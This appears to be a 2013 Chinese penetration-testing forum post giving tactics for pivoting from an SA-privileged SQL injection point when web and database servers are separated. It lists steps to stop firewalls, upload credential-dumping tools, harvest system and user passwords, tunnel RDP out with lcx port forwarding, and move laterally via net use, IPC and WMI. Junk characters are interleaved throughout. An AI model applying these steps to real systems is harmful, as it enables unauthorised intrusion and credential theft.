中国网络渗透测试联盟

标题: SA权限网站和数据库分离的一些思路 [打印本页]
作者: admin    时间: 2013-2-16 21:46
标题: SA权限网站和数据库分离的一些思路
当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。9 a) i1 ^4 M& e; N
% p- _9 q; l. M* Q) ]

7 s! e3 {+ }6 p3 E7 w5 o( A
, W9 g( n, J3 T2 @# S- cSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
$ a+ D9 k& o- y& H5 }7 w, g+ o3 C) W( }+ R! f$ r  y+ G2 _

, m7 L1 \% t' v一、DB机有公网IP.
2 }! X7 R: D6 W. O# W' l9 @- h
# s" [/ \8 \2 |1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
1 J* V! i/ B: X5 M& a
; Y# |9 l% y5 ^, I: y1 B: B4 {  t
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
/ g6 d1 i5 i  w3 Y
3 Q3 j! U; {5 w# z( j0 H: S( e0 [8 ~- x6 p5 K# v
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
. Q0 R1 ?$ T6 h5 P, {2 |% d! W, D- z+ R+ C8 B+ ]
. G: u5 l) _& Y4 N, m& Q
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.# m& u8 [& @: l! b6 ~
/ a. Q1 k$ Z* X6 V( y7 Z4 ^. i

( A! D- W; l3 J/ u4 u* ?% p. u1 q: i! r# O, B
二、DB机只有内网IP
  B* o  ^# }) I: l% o1 R3 N8 }, z: `5 Z7 r9 R+ l
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.7 b# @) C% [. y7 l2 [7 C* ~  e$ R
+ R  z2 k' [; B/ W6 a. v8 J$ Z$ |

0 @" O1 F# U* `2:停掉防火墙和IP策略再从内往外扫描.( i" N1 G7 D) V

/ s" t9 e, b2 L. n% N3 }" ^. l6 Y& M& i1 e( J+ N
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
' [9 y! R7 w& c
( p5 ~% I7 d8 x( Z$ u; ]2 i* Y1 U& O7 `
4:学会密码规律分析往往会有惊喜.0 v4 x, g# |9 P3 }. V( R
( J9 ]7 I/ d5 p. ?# h
  H% b; M2 X$ c" w4 N. a3 N
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
$ ?  r4 o( r  o1 C1 L7 {1 q# j7 A4 o2 [+ C; i& G2 N
" V1 C# z0 v5 r6 A& B+ I) Q
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的​



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2